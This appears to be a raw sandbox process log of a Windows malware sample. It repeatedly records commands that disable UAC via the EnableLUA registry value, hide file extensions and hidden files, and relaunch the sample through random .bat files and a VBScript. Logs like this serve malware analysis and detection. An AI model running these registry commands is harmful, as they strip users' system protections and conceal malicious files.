reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\hkEYUoMU.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\TigUwEsg.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rWUEEEYE.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HuUUsYAM.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SYYYIkYY.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\KWMIEAEY.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\oYUEoYso.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dwkoUUEY.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HYcMYYoM.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xKYckYsw.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dYsskIMI.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\oKkUAcsg.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\eUkQUwMU.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\MisEcIYA.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YWYIYoUs.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\OiAkMUwg.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zcQcgwIU.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\riMwEEEE.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\JMsoEIgo.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qOskcAIE.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iOEsEAAg.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DAIsMcEk.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\cscript.exe
